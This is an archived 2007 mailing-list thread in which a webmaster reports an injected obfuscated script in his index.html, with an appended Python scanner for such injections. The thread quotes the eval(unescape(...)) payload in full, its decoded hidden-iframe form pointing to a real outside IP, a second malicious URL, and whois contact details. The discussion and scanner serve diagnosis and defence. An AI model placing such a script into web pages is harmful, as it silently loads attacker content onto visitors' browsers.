[ale] I've been hacked!

Robert L. Harris nomad at rdlg.net
Wed Nov 21 18:48:34 EST 2007



This is actually a nasty malware that's been out for about 6 months.
It's part of one of the ugly spam networks.


Adrin wrote:
> NICE!!!!
> 
> When you click on the link, you get forwarded to another place instead.
> It doesn't do anything on a Linux machine using Firefox; the page
> appears to be blank.
> http://72.232.116.12/~futured/frt23.php?'+Math.round(Math.random()*46683)+'a9b%5c' 
> 
> And a whois 72.232.116.12
> 
> OrgName:    Layered Technologies, Inc. 
> OrgID:      LAYER-3
> Address:    5085 W Park Blvd
> Address:    Suite 700
> City:       Plano
> StateProv:  TX
> PostalCode: 75093
> Country:    US
> 
> ReferralServer: rwhois://rwhois.layeredtech.com:4321
> 
> NetRange:   72.232.0.0 - 72.233.127.255 
> CIDR:       72.232.0.0/16, 72.233.0.0/17 
> NetName:    LAYERED-TECH-
> NetHandle:  NET-72-232-0-0-1
> Parent:     NET-72-0-0-0-0
> NetType:    Direct Allocation
> NameServer: NS1.LAYEREDTECH.COM
> NameServer: NS2.LAYEREDTECH.COM
> Comment:    Please send all abuse complaints to
> Comment:    abuse at layeredtech.com
> RegDate:    2005-09-07
> Updated:    2007-02-27
> 
> RTechHandle: JPS66-ARIN
> RTechName:   Suo-Anttila, Jeremy Paul
> RTechPhone:  +1-972-398-7998
> RTechEmail:  jps at layeredtech.com 
> 
> OrgAbuseHandle: LAT-ARIN
> OrgAbuseName:   LT Abuse Team 
> OrgAbusePhone:  +1-972-398-7998
> OrgAbuseEmail:  abuse at layeredtech.com
> 
> OrgNOCHandle: LIT-ARIN
> OrgNOCName:   LT IP-Network Team 
> OrgNOCPhone:  +1-972-398-7998
> OrgNOCEmail:  ipnet at layeredtech.com
> 
> OrgTechHandle: LNT3-ARIN
> OrgTechName:   LT NOC Team 
> OrgTechPhone:  +1-972-398-7998
> OrgTechEmail:  ipnet at layeredtech.com
> 
> # ARIN WHOIS database, last updated 2007-11-20 19:10
> # Enter ? for additional hints on searching ARIN's WHOIS database.
> 
> 
> Found a referral to rwhois.layeredtech.com:4321.
> 
> %rwhois V-1.5:001eff:00 rwhois.layeredtech.com (by Network Solutions,
> Inc. V-1.5.7.3)
> network:Class-Name:network
> network:ID:ORG-LAYER-3.72.232.0.0/16
> network:Auth-Area:72.232.0.0/16
> network:Network-Name:72.232.116.1/25
> network:IP-Network:72.232.116.1/25
> network:Organization;I:romansemenchuk.com
> network:Org-Name:romansemenchuk.com
> network:Street-Address:Private Residence contact abuse at layeredtech.com
> for details
> network:City:Kharkov
> network:State:of Kharkov
> network:Postal-Code:61052
> network:Country-Code:UA
> network:Phone:972-398-7998
> network:Tech-Contact;I:hostmaster at layeredtech.com
> network:Admin-Contact;I:support at layeredtech.com
> network:Abuse-Contact;I:abuse at layeredtech.com
> network:Created:20070257
> network:Updated:20070257
> network:Updated-By:hostmaster at layeredtech.com
> 
> 
> 
> 
> On Wed, 2007-11-21 at 18:33 -0500, Adrin wrote:
>> whois 69.73.146.142
>>
>> OrgName:    Jaguar Technologies LLC 
>> OrgID:      JTL-8
>> Address:    4201 SW Freeway suite#216
>> City:       Houston
>> StateProv:  TX
>> PostalCode: 77027
>> Country:    US
>>
>> NetRange:   69.73.128.0 - 69.73.191.255 
>> CIDR:       69.73.128.0/18 
>> NetName:    JAGUAR-TECHNOLOGIES-NOC
>> NetHandle:  NET-69-73-128-0-1
>> Parent:     NET-69-0-0-0-0
>> NetType:    Direct Allocation
>> NameServer: NS.NOCDIRECT.COM
>> NameServer: NS2.NOCDIRECT.COM
>> Comment:    NOCDIRECT
>> RegDate:    2003-11-05
>> Updated:    2005-04-15
>>
>> RAbuseHandle: ABUSE370-ARIN
>> RAbuseName:   Abuse 
>> RAbusePhone:  +1-713-960-1502
>> RAbuseEmail:  abuse at jaguarpc.com 
>>
>> OrgTechHandle: GL538-ARIN
>> OrgTechName:   Landis, Greg 
>> OrgTechPhone:  +1-832-279-5529
>> OrgTechEmail:  greg at jaguarpc.com
>>
>> # ARIN WHOIS database, last updated 2007-11-20 19:10
>> # Enter ? for additional hints on searching ARIN's WHOIS database.
>>
>> I seem to recall that IIS has/had a hosting bug of some type.  From what
>> I remember one virtual hosting domain could infect another on the same
>> server.  I wish I could remember where I read about it.  I remember
>> mostly that it was a RED HAT hosting site that had switched to M$ because
>> of SCO Lawyers.
>>
>>
>>
>> On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
>>> Last summer I received notification from Google that a web page on one 
>>> of my web hosting accounts was infected with some sort of malware bug. 
>>>
>>> This account only has ftp access so I changed the password for the one 
>>> and only ftp account and removed the offending code from my index.html 
>>> file.  I also added a cron job to another site to compare a good 
>>> index.html with the one on the site that had been hacked in case they 
>>> came back.
>>>
>>> They did.
>>>
>>> Today I received a message that said the compare failed and found the 
>>> following at the top of the body in my index.html file:
>>>
>>> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
>>> </script>
>>>
>>> That script, unescaped looks like:
>>>
>>> window.status='Done';document.write('<iframe name=7b73 
>>> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
>>> width=351 height=133 style=\'display: none\'></iframe>')
>>>
>>> Has anyone seen anything like this before?  I wonder what sort of evil 
>>> function it might perform?
>>>
>>> I also wonder how they got access the second time?  I went through the 
>>> cgi scripts on that system to be sure they were mine. There aren't any 
>>> php files on the system.
>>>
>>> I attempted to look up the IP address but nslookup said it didn't exist, 
>>> however it pings and the index.html file from it is the default apache2 
>>> index file.  I suspect that system has been hacked as well.
>>>
>>> Note the incident from last Summer was a different one.
>>>
>>> Thanks,
>>> Jim.
>>>
>>>
>>> _______________________________________________
>>> Ale mailing list
>>> Ale at ale.org
>>> http://www.ale.org/mailman/listinfo/ale
> 

- --

:wq!
-
---------------------------------------------------------------------------
Robert L. Harris                     | GPG Key ID: E344DA3B
                                         @ x-hkp://pgp.mit.edu
DISCLAIMER:
      These are MY OPINIONS             With Dreams To Be A King,
       ALONE.  I speak for              First One Should Be A Man
       no-one else.                       - Manowar
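A defender-side decoder for the eval(unescape(...)) injection Jim quoted above, written as an added example that is not from the thread: it decodes the percent-escaped payload the way JavaScript's unescape() would and flags the hidden iframe it writes, so a cron-style check can report what changed rather than only that index.html differs. The host 198.51.100.7 and path are constructed placeholders, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: a page with the injection style Jim found, eval(unescape("%.."))
# writing an invisible iframe. Host 198.51.100.7 and path are placeholders, not a real site.
DECODED_PAYLOAD = (
    "window.status='Done';document.write('<iframe name=7b73 "
    "src=\\'http://198.51.100.7/~example/frt.php?'"
    "+Math.round(Math.random()*46683)+'a9b\\' "
    "width=351 height=133 style=\\'display: none\\'></iframe>')"
)
ENCODED_PAYLOAD = "".join("%%%02x" % b for b in DECODED_PAYLOAD.encode("latin-1"))
SAMPLE_HTML = ('<html><body><script>eval(unescape("' + ENCODED_PAYLOAD
               + '"));</script><h1>Welcome</h1></body></html>')

EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*["\']([^"\']*)["\']\s*\)\s*\)', re.I)
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
SRC = re.compile(r'src=\\?["\']?([^"\'\\ >]+)', re.I)
INVISIBLE = re.compile(r'display:\s*none|visibility:\s*hidden|\b(width|height)=["\']?0\b', re.I)

def js_unescape(s):
    """Decode what JavaScript's unescape() would: %uXXXX first, then %XX."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')

def decode_payloads(html):
    """Return the decoded script of every eval(unescape("...")) call in the page."""
    return [js_unescape(m.group(1)) for m in EVAL_UNESCAPE.finditer(html)]

def hidden_iframes(js):
    """List iframes the decoded script would write, flagging invisible ones."""
    found = []
    for m in IFRAME.finditer(js):
        attrs = m.group(1)
        src = SRC.search(attrs)
        found.append({"src": src.group(1) if src else None,
                      "hidden": bool(INVISIBLE.search(attrs))})
    return found

def scan(html):
    """Report hidden iframes injected via eval(unescape()), plus two tell-tales
    from Jim's sample: a Math.random() cache-buster and a window.status rewrite."""
    report = []
    for js in decode_payloads(html):
        for f in hidden_iframes(js):
            f["random_url"] = "Math.random" in js   # defeats caching/proxies
            f["sets_status"] = "window.status" in js  # hides the load in status bar
            report.append(f)
    return report
```

Run scan() over the fetched index.html from the comparison job; an empty list means no eval(unescape()) iframe injection was found, and each finding carries the iframe's src so the abuse report can name the host.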



